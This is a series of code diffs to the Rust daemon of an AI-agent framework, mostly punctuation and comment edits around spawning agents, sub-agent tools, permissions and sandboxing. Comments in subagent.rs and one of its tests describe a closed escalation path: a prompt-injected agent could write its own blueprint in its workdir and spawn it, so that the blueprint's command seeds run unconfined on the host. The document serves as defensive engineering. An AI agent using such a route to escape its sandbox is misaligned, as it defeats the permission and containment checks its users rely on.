+/// build than this CLI (or recorded no build at all - e.g. it predates this
 /// check).
 pub fn daemon_build_is_stale(recorded: Option<&str>) -> bool {
     recorded != Some(CURRENT_BUILD)
@@ -93,11 +93,11 @@ pub async fn setup_daemon_host(
     crate::daemon::script_host::set_local_network_allowed(config.security.allow_local_network);
     let providers = build_provider_registry_from_config(&config);
     // MCP connections are shared across agents; the workdir here only seeds the
-    // (discarded) built-ins — each agent gets its own over its own workdir.
+    // (discarded) built-ins - each agent gets its own over its own workdir.
     let registry = ToolRegistry::build(std::env::temp_dir(), &config).await;
     // The shared MCP pool: seed the connected global servers, then reconnect the
     // per-agent MCP servers of any non-terminal persisted run so a run reloaded on
-    // restart can still execute its blueprint MCP tools (recovery warming — the
+    // restart can still execute its blueprint MCP tools (recovery warming - the
     // async counterpart of the live-spawn preprocessor, done here before the
     // sync reload inside build_host).
     let mcp_pool = crate::daemon::mcp_pool::McpPool::for_daemon_with(
@@ -121,7 +121,7 @@ pub async fn setup_daemon_host(
 
 /// The reap hook installed on the host: drops a reaped agent's tool state and
 /// tears down its sandbox via [`CliToolService::reap`]. Factored out (rather than
-/// an inline closure) so its body is exercised by a unit test — the daemon itself
+/// an inline closure) so its body is exercised by a unit test - the daemon itself
 /// only ever fires the reaper from the private `serve()` loop.
 fn make_reaper(tool_service: Arc<CliToolService>) -> leviath_runtime::host::Reaper {
     Box::new(move |_world, entity| tool_service.reap(entity))
@@ -252,7 +252,7 @@ pub fn build_host(
 
     // Last resort for a cancel the world can't service: force the run's on-disk
     // state to `Cancelled`. The reloader above declines whenever a run can't be
-    // rebuilt — deleted blueprint, unreadable metadata, died mid-spawn — and
+    // rebuilt - deleted blueprint, unreadable metadata, died mid-spawn - and
     // without this a cancel in that state wrote nothing at all, so `meta.json`
     // went on claiming the run was live and nothing could ever clear it.
     let terminate_runs = runs_dir.clone();
@@ -263,17 +263,17 @@ pub fn build_host(
     // Reap hook: when a terminal agent is reaped, tear down its sandbox and drop
     // its per-agent tool state (the latter also fixing a prior leak where tool
     // state was never released). Factored into `make_reaper` so the closure body
-    // is unit-testable — the daemon only ever drives it from `serve()`.
+    // is unit-testable - the daemon only ever drives it from `serve()`.
     host.set_reaper(make_reaper(tool_service.clone()));
 
     // The shared MCP pool (created + recovery-warmed by the caller). Per-agent
     // `[[mcp_servers]]` connect lazily through it.
 
     // Preprocessor: before the sync spawner runs, connect the blueprint's declared
-    // MCP servers into the shared pool (lazy, deduped) so they're warm to advertise
-    // — and pre-warm the servers declared by any `worker_agent`/`worker_query`
+    // MCP servers into the shared pool (lazy, deduped) so they're warm to advertise -
+    // and pre-warm the servers declared by any `worker_agent`/`worker_query`
     // fan-out worker this blueprint will spawn, so the *first* such worker already
-    // advertises them (they'd otherwise land one turn late — issue #97).
+    // advertises them (they'd otherwise land one turn late - issue #97).
     let pp_pool = mcp_pool.clone();
     let pp_agents_dir = leviath_core::paths::agents_dir();
     host.set_spawn_preprocessor(Box::new(move |args| {
@@ -295,7 +295,7 @@ pub fn build_host(
         // Stake out the run directory before anything that can fail: blueprint
         // parsing, sandbox creation, provider resolution and seed validation all
         // come later, and until now a failure at any of them left no trace on
-        // disk at all — no run dir, no meta.json, nothing to diagnose (#107).
+        // disk at all - no run dir, no meta.json, nothing to diagnose (#107).
         // The reload path deliberately doesn't do this: it must not overwrite a
         // recovering run's own metadata.
         write_placeholder_meta(&spawn_runs_dir, args);
@@ -318,11 +318,11 @@ pub fn build_host(
 /// Create the run directory and write a `Starting` `meta.json` for a run that is
 /// about to be built, so a spawn that dies partway through still leaves something
 /// on disk to explain itself (issue #107: 3/13 empty runs crashed before any
-/// state existed). Everything the agent hasn't resolved yet — model, stage names,
-/// stage count — is left blank; the first persistence tick overwrites the file
+/// state existed). Everything the agent hasn't resolved yet - model, stage names,
+/// stage count - is left blank; the first persistence tick overwrites the file
 /// with the real thing. Best-effort: a failure here must not block the spawn.
 ///
-/// Writes under the host's configured `runs_dir` — the same directory the
+/// Writes under the host's configured `runs_dir` - the same directory the
 /// persistence lane and the reloader use. It deliberately does *not* go through
 /// `runstate::create_run`, which resolves the runs dir globally from
 /// `dirs::home_dir()`: that ignored a daemon configured with a different runs dir
@@ -331,7 +331,7 @@ pub fn build_host(
 /// developer's own `~/.leviath/runs` (where they then showed as permanently
 /// ACTIVE, since nothing would ever advance them).
 fn write_placeholder_meta(runs_dir: &std::path::Path, args: &leviath_runtime::host::SpawnArgs) {
-    // The real agent name lives in the blueprint, which hasn't been parsed yet —
+    // The real agent name lives in the blueprint, which hasn't been parsed yet -
     // but the run id is `<agent>-<unix-secs>-<hex4>`, so its prefix is the name
     // (dashes inside the agent name included).
     let agent_name = args
@@ -409,7 +409,7 @@ async fn warm_fanout_worker_mcp(
 }
 
 /// The per-agent MCP tool defs: the global servers' defs plus this blueprint's
-/// declared servers' cached defs (the pool must already be warm — the
+/// declared servers' cached defs (the pool must already be warm - the
 /// preprocessor ran). A missing/unreadable manifest yields just the global defs.
 /// Extracted from the spawner closure so its body is unit-testable.
 fn per_agent_mcp_defs(
@@ -585,7 +585,7 @@ mod tests {
     #[test]
     fn placeholder_meta_failure_is_logged_not_fatal() {
         // An unwritable runs dir (here: a path *under a regular file*) must not
-        // stop the spawn — the placeholder is a diagnostic, not a prerequisite.
+        // stop the spawn - the placeholder is a diagnostic, not a prerequisite.
         crate::test_support::with_tracing(|| {
             let dir = tempfile::tempdir().unwrap();
             let blocker = dir.path().join("not-a-dir");
@@ -607,7 +607,7 @@ mod tests {
     /// This is an isolation invariant, not a convenience: `runstate::run_dir()`
     /// goes through `dirs::home_dir()`, which ignores a `$HOME` override on macOS,
     /// so a spawner that used it wrote into the developer's real `~/.leviath/runs`
-    /// from any test that drove a real host — leaving `status: "starting"` runs
+    /// from any test that drove a real host - leaving `status: "starting"` runs
     /// that no daemon owned and nothing could ever advance. Asserting the global
     /// dir is untouched is what keeps that from coming back.
     #[tokio::test]
@@ -653,7 +653,7 @@ mod tests {
     }
 
     /// End-to-end for the reported bug: a run whose blueprint no longer exists
-    /// cannot be rebuilt, so the reloader declines — and the cancel used to stop
+    /// cannot be rebuilt, so the reloader declines - and the cancel used to stop
     /// there, replying "no such run" and writing nothing, leaving `meta.json`
     /// claiming the run was live with no way to ever clear it. It must now be
     /// terminated on disk instead.
@@ -668,13 +668,13 @@ mod tests {
         .await;
 
         // Staked out *after* startup, so the recovery sweep (which marks
-        // un-reloadable runs as crashed) hasn't already dealt with it — this is
+        // un-reloadable runs as crashed) hasn't already dealt with it - this is
         // the live case: the daemon is up and the run cannot be paged in.
         let run_dir = runs.path().join("gone-1234-ab12");
         let meta = leviath_core::run_meta::RunMeta::new(
             "gone-1234-ab12".to_string(),
             "gone".to_string(),
-            // A blueprint path that does not exist — the deleted-manifest case.
+            // A blueprint path that does not exist - the deleted-manifest case.
             "/no/such/dir/agent.leviath".to_string(),
             "t".to_string(),
             None,
@@ -1226,7 +1226,7 @@ task = {{ kind = "pinned", max_tokens = 200, seed = {{ caller_input = "task" }} 
             || 100,
         );
 
-        // Persist a running run only now — build_host's startup reload already ran,
+        // Persist a running run only now - build_host's startup reload already ran,
         // so it is on disk but absent from the world.
         let run_dir = runs.path().join("late");
         std::fs::create_dir_all(&run_dir).unwrap();

--- a/crates/leviath-cli/src/daemon/spawn.rs
+++ b/crates/leviath-cli/src/daemon/spawn.rs
@@ -200,7 +200,7 @@ pub(crate) fn current_platform_satisfies(required_caps: &[String]) -> bool {
 /// advertised `Tool` defs.
 ///
 /// A tool whose `@requires` capabilities the current platform can't satisfy is
-/// dropped here (self-declared platform gating, issue #97) - mirroring how
+/// dropped here (self-declared platform gating) - mirroring how
 /// built-ins filter against [`PlatformCapabilities`].
 pub(crate) fn discover_script_tools_in(
     dirs: &[std::path::PathBuf],
@@ -254,7 +254,7 @@ pub fn filter_tools_by_available(all: &[Tool], available: &[String]) -> Vec<Tool
         .collect()
 }
 
-/// Discover the agent's Rhai script tools (issue #97) and build their `Tool`
+/// Discover the agent's Rhai script tools and build their `Tool`
 /// defs (the spawn-time entry point). `extra_dir` adds the run workdir's `tools/`
 /// for `dynamic_tools` agents.
 fn discover_script_tools(
@@ -336,8 +336,8 @@ fn build_tool_state(
 ///   required-at-spawn gate, before any inference.
 /// - `Files` / `Glob` read workdir files; `Literal` is verbatim; `Rhai` runs a
 ///   workdir script whose `String` return seeds the region.
-/// - `Command` runs a shell command in the workdir under `commands` (issue
-///   #108) - sandboxed, time- and size-capped, and skippable. Every failure is
+/// - `Command` runs a shell command in the workdir under `commands` -
+///   sandboxed, time- and size-capped, and skippable. Every failure is
 ///   non-fatal unless the region is `required`.
 /// - Any caller key (other than `task`) that isn't a declared `CallerInput`
 ///   region is rejected (typo protection, mirrors the CLI-side check).
@@ -781,8 +781,8 @@ fn build_agent_inner(
         .collect();
     // Agent-level tool permissions (the manifest's top-level `[tool_permissions]`,
     // recorded in blueprint metadata). Populates the tool state's agent-level
-    // policy layer (between stage and global in `resolve_policy`), which was
-    // previously always empty.
+    // policy layer (between stage and global in `resolve_policy`) - without this
+    // the manifest's top-level block would be silently ignored.
     let agent_perms = blueprint.agent_tool_permissions();
     // Each stage's `available_tools` (Layer-1 allowlist), captured before the
     // blueprint moves - a `dynamic_tools` agent re-filters against these on refresh.
@@ -1763,8 +1763,9 @@ mod tests {
     #[tokio::test]
     async fn build_agent_no_security_block_leaves_taint_off_by_default() {
         // Bug regression: a blueprint with no `[security]` block and a default
-        // (taint-off) global config must NOT attach the taint gate - previously
-        // `unwrap_or_default()` forced it on for every agent.
+        // (taint-off) global config must NOT attach the taint gate - an
+        // `unwrap_or_default()` on the resolved security forces it on for
+        // every agent.
         let dir = tempfile::tempdir().unwrap();
         let manifest = dir.path().join("agent.leviath");
         std::fs::write(

--- a/crates/leviath-cli/src/daemon/spawn.rs
+++ b/crates/leviath-cli/src/daemon/spawn.rs
@@ -1,5 +1,5 @@
 //! The daemon spawner: turns a [`SpawnArgs`] request into a live agent in the
-//! shared world — the CLI-side policy the runtime host calls for a `Spawn`
+//! shared world - the CLI-side policy the runtime host calls for a `Spawn`
 //! control op.
 //!
 //! It loads the blueprint, resolves each stage's provider/model (against the
@@ -7,7 +7,7 @@
 //! [`leviath_runtime::pipeline::spawn_agent`], attaches its run metadata /
 //! token totals / compaction settings, and registers its per-agent tool state
 //! with the [`CliToolService`]. The heavy MCP connections are shared (built once
-//! at daemon startup), so this whole path is synchronous — which lets it run
+//! at daemon startup), so this whole path is synchronous - which lets it run
 //! straight from the host's control loop.
 
 use std::collections::{HashMap, HashSet};
@@ -150,7 +150,7 @@ fn script_scan_dirs(
         .collect()
 }
 
-/// Names already claimed by a built-in, sub-agent, or MCP tool — a discovered
+/// Names already claimed by a built-in, sub-agent, or MCP tool - a discovered
 /// script tool colliding with one of these is dropped (never shadows a core tool).
 fn reserved_tool_names(builtin_names: &HashSet<String>, mcp_tool_defs: &[Tool]) -> HashSet<String> {
     let mut reserved: HashSet<String> = builtin_names.clone();
@@ -183,7 +183,7 @@ fn platform_satisfies_caps(
         .all(|c| script_cap(c).is_some_and(|cap| platform.supports(cap)))
 }
 
-/// Whether the *current* platform can satisfy a script's `@requires` — the same
+/// Whether the *current* platform can satisfy a script's `@requires` - the same
 /// gate `discover_script_tools_in` applies at spawn. Exposed so the read-only CLI
 /// surfaces (`lev tools`, `lev validate`, `lev mcp list`) report a tool's real
 /// availability (and flag an unknown/typo'd capability) instead of listing a tool
@@ -200,7 +200,7 @@ pub(crate) fn current_platform_satisfies(required_caps: &[String]) -> bool {
 /// advertised `Tool` defs.
 ///
 /// A tool whose `@requires` capabilities the current platform can't satisfy is
-/// dropped here (self-declared platform gating, issue #97) — mirroring how
+/// dropped here (self-declared platform gating, issue #97) - mirroring how
 /// built-ins filter against [`PlatformCapabilities`].
 pub(crate) fn discover_script_tools_in(
     dirs: &[std::path::PathBuf],
@@ -219,12 +219,12 @@ pub(crate) fn discover_script_tools_in(
     let mut defs = Vec::new();
     for meta in set.metas() {
         if reserved.contains(&meta.name) {
-            tracing::warn!(tool = %meta.name, "script tool name collides with an existing tool — ignoring");
+            tracing::warn!(tool = %meta.name, "script tool name collides with an existing tool - ignoring");
             continue;
         }
         if !platform_satisfies_caps(&platform, &meta.required_caps) {
             let caps = meta.required_caps.join(", ");
-            tracing::warn!(tool = %meta.name, requires = %caps, "script tool requires a capability this platform lacks — ignoring");
+            tracing::warn!(tool = %meta.name, requires = %caps, "script tool requires a capability this platform lacks - ignoring");
             continue;
         }
         names.insert(meta.name.clone());
@@ -332,12 +332,12 @@ fn build_tool_state(
 /// The caller map is `{ "task": args.task } ∪ args.regions` (a `regions["task"]`
 /// wins). Then:
 /// - `CallerInput { name }` pulls from the caller map; if the region is
-///   `required` and the value is missing/blank this returns `Err` — the
+///   `required` and the value is missing/blank this returns `Err` - the
 ///   required-at-spawn gate, before any inference.
 /// - `Files` / `Glob` read workdir files; `Literal` is verbatim; `Rhai` runs a
 ///   workdir script whose `String` return seeds the region.
 /// - `Command` runs a shell command in the workdir under `commands` (issue
-///   #108) — sandboxed, time- and size-capped, and skippable. Every failure is
+///   #108) - sandboxed, time- and size-capped, and skippable. Every failure is
 ///   non-fatal unless the region is `required`.
 /// - Any caller key (other than `task`) that isn't a declared `CallerInput`
 ///   region is rejected (typo protection, mirrors the CLI-side check).
@@ -379,7 +379,7 @@ fn resolve_seeds(
                             )
                         }));
                     }
-                    // Optional and unprovided — leave the region empty.
+                    // Optional and unprovided - leave the region empty.
                     continue;
                 }
                 seeds.insert(region.name.clone(), value.to_string());
@@ -530,7 +530,7 @@ fn read_and_concat(
 /// [`World`] so it is callable both from the host's spawner (via
 /// `PipelineWorld::world_mut`) and from a fan-out world-system.
 ///
-/// Enforces the required-at-spawn region gate — a fresh spawn whose required
+/// Enforces the required-at-spawn region gate - a fresh spawn whose required
 /// caller-input regions weren't provided fails here. Use
 /// [`build_agent_for_reload`] on the recovery path, where the window is restored
 /// from a snapshot afterward and the gate must not re-fire.
@@ -560,7 +560,7 @@ pub fn build_agent(
     )
 }
 
-/// Like [`build_agent`], but skips the required-at-spawn region gate — used by
+/// Like [`build_agent`], but skips the required-at-spawn region gate - used by
 /// restart recovery, which reloads a run that already passed the gate when first
 /// spawned and whose context window is restored from a snapshot after this call.
 #[allow(clippy::too_many_arguments)]
@@ -632,7 +632,7 @@ fn build_agent_inner(
     if let Some(default_max) = config.limits.default_max_iterations {
         for stage in &mut blueprint.stages {
             // `0` means *unbounded* to the pipeline, and `get_or_insert` only
-            // fills `None` — so a manifest writing `max_iterations = 0` looked
+            // fills `None` - so a manifest writing `max_iterations = 0` looked
             // like "unset" while actually opting out of the user's ceiling
             // entirely, and looped without limit against their API keys. A
             // manifest may still declare its own finite number; it may not
@@ -694,7 +694,7 @@ fn build_agent_inner(
     all_tool_defs.extend(leviath_tools::BuiltinTools::subagent_tool_defs());
     all_tool_defs.extend(mcp_tool_defs.iter().cloned());
     // The non-script defs (built-in + sub-agent + MCP), captured before script
-    // defs are appended — a `dynamic_tools` agent re-filters against these plus a
+    // defs are appended - a `dynamic_tools` agent re-filters against these plus a
     // fresh script scan on each mid-run refresh.
     let static_tool_defs = all_tool_defs.clone();
 
@@ -742,8 +742,8 @@ fn build_agent_inner(
     // config's `taint_tracking`, else off. Cascading through
     // `resolve_security` (rather than `unwrap_or_default`, which forced taint on
     // for every agent because `SecurityConfig::default()` is taint-on) means a
-    // blueprint with no `[security]` block correctly inherits the global setting
-    // — off by default. When on, the agent's outbound tool calls are gated
+    // blueprint with no `[security]` block correctly inherits the global setting -
+    // off by default. When on, the agent's outbound tool calls are gated
     // against its context taint + the policy allowlist; when off no gate is
     // attached (zero enforcement overhead).
     let security = leviath_core::taint::resolve_security(
@@ -785,7 +785,7 @@ fn build_agent_inner(
     // previously always empty.
     let agent_perms = blueprint.agent_tool_permissions();
     // Each stage's `available_tools` (Layer-1 allowlist), captured before the
-    // blueprint moves — a `dynamic_tools` agent re-filters against these on refresh.
+    // blueprint moves - a `dynamic_tools` agent re-filters against these on refresh.
     let stage_available: Vec<Vec<String>> = blueprint
         .stages
         .iter()
@@ -797,7 +797,7 @@ fn build_agent_inner(
 
     // 5. Resolve region seeds (caller input + blueprint-declared sources) into
     // concrete content. On a fresh spawn (`enforce_seeds`), required caller-input
-    // regions that weren't provided fail here — before any inference, so no
+    // regions that weren't provided fail here - before any inference, so no
     // tokens are spent. On reload the window is restored from a snapshot after
     // this, so seeding is skipped entirely.
     // Command seeds (issue #108) run here, so they inherit the entry stage's
@@ -1295,7 +1295,7 @@ mod tests {
     use tokio::runtime::Handle;
 
     fn coder_manifest() -> String {
-        // Self-contained fixture — not the shipped blueprint, so these spawn-logic
+        // Self-contained fixture - not the shipped blueprint, so these spawn-logic
         // tests stay isolated from agents/coder edits.
         crate::test_support::inline_coder_manifest()
     }
@@ -1581,7 +1581,7 @@ mod tests {
     #[tokio::test]
     async fn build_agent_errors_when_required_caller_region_missing() {
         // A required caller-input region that the request doesn't provide makes
-        // build_agent fail (via resolve_seeds) before spawning — no inference.
+        // build_agent fail (via resolve_seeds) before spawning - no inference.
         let dir = tempfile::tempdir().unwrap();
         let manifest = dir.path().join("agent.leviath");
         std::fs::write(
@@ -1649,7 +1649,7 @@ mod tests {
     #[tokio::test]
     async fn build_agent_errors_when_sandbox_runtime_unavailable() {
         // A container sandbox naming a nonexistent engine fails to start on every
-        // platform (no runtime needed), so build_agent surfaces the error — this
+        // platform (no runtime needed), so build_agent surfaces the error - this
         // covers the `?` on `SandboxManager::build` uniformly across OSes,
         // independent of which container runtimes happen to be installed.
         let dir = tempfile::tempdir().unwrap();
@@ -1763,7 +1763,7 @@ mod tests {
     #[tokio::test]
     async fn build_agent_no_security_block_leaves_taint_off_by_default() {
         // Bug regression: a blueprint with no `[security]` block and a default
-        // (taint-off) global config must NOT attach the taint gate — previously
+        // (taint-off) global config must NOT attach the taint gate - previously
         // `unwrap_or_default()` forced it on for every agent.
         let dir = tempfile::tempdir().unwrap();
         let manifest = dir.path().join("agent.leviath");
@@ -1963,7 +1963,7 @@ mod tests {
     async fn build_agent_honors_agent_level_tool_permissions() {
         let dir = tempfile::tempdir().unwrap();
         let manifest = dir.path().join("agent.leviath");
-        // A top-level `[tool_permissions]` block denying a builtin — no stage
+        // A top-level `[tool_permissions]` block denying a builtin - no stage
         // perms, no launch overrides, no global config deny. Only the agent-level
         // layer can produce the deny, so this proves it is wired through.
         std::fs::write(
@@ -2020,7 +2020,7 @@ mod tests {
         // `write_file` defaults to Ask, and a script-permission `Inherit`
         // permits the host function only on a hard Allow. The grant below
         // lives solely in the user's per-agent block, so the script host can
-        // only see it through the agent-scoped ceiling — the raw global
+        // only see it through the agent-scoped ceiling - the raw global
         // `[tool_permissions]` map is empty here.
         let mut config = Config::default();
         config.agent_tool_permissions.insert(
@@ -2126,7 +2126,7 @@ mod tests {
         let (mut world, cli) = test_world();
         let hub = InteractionHub::new();
         let mcp = Arc::new(Mutex::new(leviath_mcp::ToolExecutor::new()));
-        // `None` disables the config default entirely — the stage stays uncapped.
+        // `None` disables the config default entirely - the stage stays uncapped.
         let config = Config {
             limits: crate::config::LimitsConfig {
                 default_max_iterations: None,
@@ -2729,7 +2729,7 @@ docs = { kind = "pinned", max_tokens = 2000, seed = { files = ["a.txt", "b.txt"]
 
     #[test]
     fn resolve_seeds_required_command_errors_when_disabled() {
-        // A required region can't be silently left empty — the run stops with a
+        // A required region can't be silently left empty - the run stops with a
         // message naming the switch that turned command seeds off.
         let bp = command_bp(true);
         let args = args_with("t", HashMap::new(), "/tmp");

--- a/crates/leviath-cli/src/daemon/subagent.rs
+++ b/crates/leviath-cli/src/daemon/subagent.rs
@@ -2,7 +2,7 @@
 //! `wait_for_agent` / `send_to_agent` / `kill_agent` tool calls into
 //! [`SubAgentOp`]s serviced by the host (which owns the world + spawner). The
 //! tool lane runs off the world, so it blocks on the host applying each op via a
-//! oneshot — the same shape as an interaction.
+//! oneshot - the same shape as an interaction.
 
 use std::time::Duration;
 
@@ -92,7 +92,7 @@ async fn spawn(h: &SubAgentHandle, args: &serde_json::Value) -> String {
     // Never a blueprint the agent could have written itself.
     //
     // `blueprint` comes from model output and `find_manifest` accepts any path.
-    // `write_file` is confined to the workdir — but the spawner was not, so a
+    // `write_file` is confined to the workdir - but the spawner was not, so a
     // model steered by injected content could write `x/agent.leviath` inside its
     // own workdir and then spawn it. The child is built with seeds enforced, so
     // that manifest's `seed = { command = ... }` ran on the host before its
@@ -100,7 +100,7 @@ async fn spawn(h: &SubAgentHandle, args: &serde_json::Value) -> String {
     // a confined file write escalated to unconfined command execution.
     //
     // Refusing paths *inside the workdir* closes that exactly, and leaves
-    // everything legitimate working — an installed agent by name, or a path a
+    // everything legitimate working - an installed agent by name, or a path a
     // human or the parent blueprint chose. A model that can already write
     // outside the workdir has arbitrary execution by other means, so nothing
     // here is the weak link.
@@ -108,7 +108,7 @@ async fn spawn(h: &SubAgentHandle, args: &serde_json::Value) -> String {
         return format!(
             "[error] '{blueprint}' is inside this agent's own working directory. \
              Spawn an installed agent by name, or a blueprint from outside the \
-             workspace — an agent may not author the blueprint it runs."
+             workspace - an agent may not author the blueprint it runs."
         );
     }
 
@@ -182,7 +182,7 @@ async fn wait(h: &SubAgentHandle, agent_id: &str) -> String {
             }
             // The caller itself was cancelled (or failed) while waiting. Give up
             // rather than keep polling for a child that is being torn down with
-            // it — this loop has no other exit, so it would hold its tool-lane
+            // it - this loop has no other exit, so it would hold its tool-lane
             // worker for as long as the daemon lived.
             Some(_) if caller_is_terminal(h).await => {
                 return format!("[error] cancelled while waiting for '{agent_id}'");
@@ -193,7 +193,7 @@ async fn wait(h: &SubAgentHandle, agent_id: &str) -> String {
 }
 
 /// Whether the agent that called `wait_for_agent` has itself reached a terminal
-/// state. A dropped request (daemon shutting down) counts as terminal — there is
+/// state. A dropped request (daemon shutting down) counts as terminal - there is
 /// nothing left to wait for either way.
 async fn caller_is_terminal(h: &SubAgentHandle) -> bool {
     match status_of(h, &h.parent_run_id).await {
@@ -288,7 +288,7 @@ mod tests {
     use super::*;
 
     /// The escalation this closes: `write_file` is confined to the workdir, but
-    /// the spawner was not — so a model could author `x/agent.leviath` in its own
+    /// the spawner was not - so a model could author `x/agent.leviath` in its own
     /// workspace and spawn it, and the child is built with seeds enforced, so
     /// that manifest's command seeds ran on the host before its first inference.
     #[tokio::test]
@@ -321,7 +321,7 @@ mod tests {
         }
     }
 
-    /// And a blueprint from outside the workspace is untouched — an installed
+    /// And a blueprint from outside the workspace is untouched - an installed
     /// agent by name, or a path a human chose.
     #[tokio::test]
     async fn spawn_allows_a_blueprint_outside_the_workdir() {
@@ -367,7 +367,7 @@ mod tests {
             parent_run_id: "parent".to_string(),
             // This crate's own directory, deliberately *not* the system temp
             // dir: `temp_blueprint()` writes under temp, and on Linux that is
-            // `/tmp` — so a workdir of `/tmp` made every fixture blueprint look
+            // `/tmp` - so a workdir of `/tmp` made every fixture blueprint look
             // like one the agent had planted in its own workspace, and the
             // containment guard refused them all. macOS puts tempdirs under
             // `$TMPDIR` in `/var/folders`, so nothing local caught it.
@@ -377,13 +377,13 @@ mod tests {
         }
     }
 
-    /// A `SubAgentHandle` whose host answers each op from plain canned values —
+    /// A `SubAgentHandle` whose host answers each op from plain canned values -
     /// no per-call-site closures, so this single service loop is the only region
     /// (covered collectively across the suite). `spawn_result` answers `Spawn`
     /// and the received args are recorded into the returned `Vec` for assertions;
     /// `statuses` answers successive `Check`s for *children* in order (`None`
     /// once exhausted); `ok` answers `Send`/`Kill`. The caller ("parent") is
-    /// reported `Active` — see [`fake_host_with_parent`] to script it.
+    /// reported `Active` - see [`fake_host_with_parent`] to script it.
     #[allow(clippy::type_complexity)]
     fn fake_host(
         spawn_result: Result<String, String>,
@@ -422,7 +422,7 @@ mod tests {
                     }
                     // `wait` polls the *caller* as well as the child (to bail out
                     // if the caller was itself cancelled), so the scripted queue
-                    // answers only for children — the caller is reported Active
+                    // answers only for children - the caller is reported Active
                     // unless a test scripts it otherwise.
                     SubAgentOp::Check { reply, run_id } if run_id == "parent" => {
                         let _ = reply.send(parent_status.clone());
@@ -442,7 +442,7 @@ mod tests {
         (handle_with(tx), seen, task)
     }
 
-    /// A host that drops every op without replying — the handler then sees a
+    /// A host that drops every op without replying - the handler then sees a
     /// dropped oneshot.
     fn drop_host() -> (SubAgentHandle, tokio::task::JoinHandle<()>) {
         let (tx, mut rx) = tokio::sync::mpsc::unbounded_channel();
@@ -541,7 +541,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
         )
         .await;
         assert!(out.contains("Spawned sub-agent 'child-123'"));
-        // Drop the handle and drain the host task — covers the loop's exit.
+        // Drop the handle and drain the host task - covers the loop's exit.
         drop(h);
         t.await.unwrap();
         // The seed context was folded into the child's task.
@@ -572,8 +572,8 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
     }
 
     /// `wait_for_agent` gives up when the *calling* agent is cancelled. The loop
-    /// has no other exit, and it runs on a tool-lane worker — of which there are
-    /// a fixed number — so a cancelled caller would otherwise poll for a child
+    /// has no other exit, and it runs on a tool-lane worker - of which there are
+    /// a fixed number - so a cancelled caller would otherwise poll for a child
     /// that is being torn down with it until the daemon exits.
     #[tokio::test]
     async fn wait_gives_up_when_the_calling_agent_is_cancelled() {
@@ -597,7 +597,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
     }
 
     /// A caller the host no longer knows about (daemon shutting down, or the
-    /// run already reaped) also ends the wait — there is nothing left to wait
+    /// run already reaped) also ends the wait - there is nothing left to wait
     /// for either way.
     #[tokio::test]
     async fn wait_gives_up_when_the_caller_is_unknown_to_the_host() {

--- a/crates/leviath-cli/src/daemon/tool_service.rs
+++ b/crates/leviath-cli/src/daemon/tool_service.rs
@@ -76,7 +76,7 @@ pub struct AgentToolState {
     /// `Arc` is also an ECS component (for teardown at reap) and is wired into
     /// `builtins` as the shell tool's executor.
     pub sandbox: Option<std::sync::Arc<crate::daemon::sandbox_manager::SandboxManager>>,
-    /// The agent's discovered Rhai script tools (issue #97), compiled at spawn.
+    /// The agent's discovered Rhai script tools, compiled at spawn.
     /// Behind a mutex so a `dynamic_tools` agent's mid-run re-scan can swap the
     /// set in place; static agents never mutate it.
     pub script_tools: Arc<StdMutex<leviath_scripting::ScriptToolSet>>,
@@ -87,7 +87,7 @@ pub struct AgentToolState {
     /// enforcement (Layer 3) already baked in.
     pub script_host: Arc<dyn leviath_scripting::ScriptHost>,
     /// Present only for `dynamic_tools` agents: everything needed to re-discover
-    /// and re-advertise this agent's tools mid-run (issue #97).
+    /// and re-advertise this agent's tools mid-run.
     pub dynamic: Option<Arc<DynamicToolCtx>>,
 }
 
@@ -115,12 +115,12 @@ async fn execute_tool(state: &AgentToolState, is_builtin: bool, tc: &ToolCall) -
     // host rather than the builtin/MCP executors.
     //
     // Dispatched here, *after* the policy gate, rather than short-circuiting
-    // before it. They used to take an early return in `dispatch_tools` that
-    // skipped `resolve_policy` entirely: no approval prompt was ever raised for
-    // them, and a user's `[tool_permissions] spawn_agent = "deny"` was silently
-    // ignored - the "a configured deny is terminal" guarantee simply did not
-    // cover these five names. That mattered because `spawn_agent` runs a whole
-    // second agent, with that manifest's own command seeds and MCP servers.
+    // before it. An early return in `dispatch_tools` that skipped
+    // `resolve_policy` would raise no approval prompt for them and silently
+    // ignore a user's `[tool_permissions] spawn_agent = "deny"` - the "a
+    // configured deny is terminal" guarantee would simply not cover these five
+    // names. That matters because `spawn_agent` runs a whole second agent, with
+    // that manifest's own command seeds and MCP servers.
     if crate::daemon::subagent::is_subagent_tool(&tc.name) {
         return match &state.subagent {
             Some(handle) => crate::daemon::subagent::handle(handle, tc).await,
@@ -194,10 +194,9 @@ async fn execute_script_tool(state: &AgentToolState, tc: &ToolCall) -> String {
 /// a tool error rather than taking the daemon (and every other run) with it.
 ///
 /// A free function applied via `unwrap_or_else` - not a `match` arm - because
-/// the arm can no longer be reached from a test now that panics are contained
-/// inside `leviath_scripting` (issue #109), while this body is directly
-/// unit-testable with a real `JoinError`. Mirrors
-/// `leviath_providers::rhai_provider`'s `task_failed`.
+/// panics are contained inside `leviath_scripting`, leaving the arm unreachable
+/// from a test, while this body is directly unit-testable with a real
+/// `JoinError`. Mirrors `leviath_providers::rhai_provider`'s `task_failed`.
 fn script_tool_join_failed(e: tokio::task::JoinError) -> String {
     format!("[error] script tool panicked: {e}")
 }
@@ -733,7 +732,7 @@ mod tests {
     #[test]
     fn a_poisoned_state_map_does_not_wedge_every_other_agent() {
         // `states` holds *every* agent's tool state. A panic while holding it
-        // used to poison it, so from then on `.lock().unwrap()` panicked for all
+        // poisons it, and a bare `.lock().unwrap()` then panics for all
         // agents - one bad agent taking the whole daemon's tool dispatch with it
         // (issue #109). Recovering the guard keeps the map usable.
         let svc = CliToolService::new();
@@ -1622,10 +1621,10 @@ for line in sys.stdin:
 "#;
 
     /// Returns a tool *execution* error. The error flag's wire name is
-    /// `isError`; this stub previously wrote `is_error`, which only worked
-    /// because the client read the same wrong name - so the pair agreed and
-    /// the bug stayed invisible here while every real server's tool errors
-    /// were being reported to the model as successes.
+    /// `isError`, and the stub must spell it exactly that way: a stub writing
+    /// `is_error` against a client reading the same wrong name agrees with
+    /// itself, so the bug stays invisible here while every real server's tool
+    /// errors are reported to the model as successes.
     const MCP_STUB_ERROR: &str = r#"
 import sys, json
 def respond(id_, result):

--- a/crates/leviath-cli/src/daemon/tool_service.rs
+++ b/crates/leviath-cli/src/daemon/tool_service.rs
@@ -1,6 +1,6 @@
 //! The real [`ToolService`] for the shared world: bridges an agent's tool calls
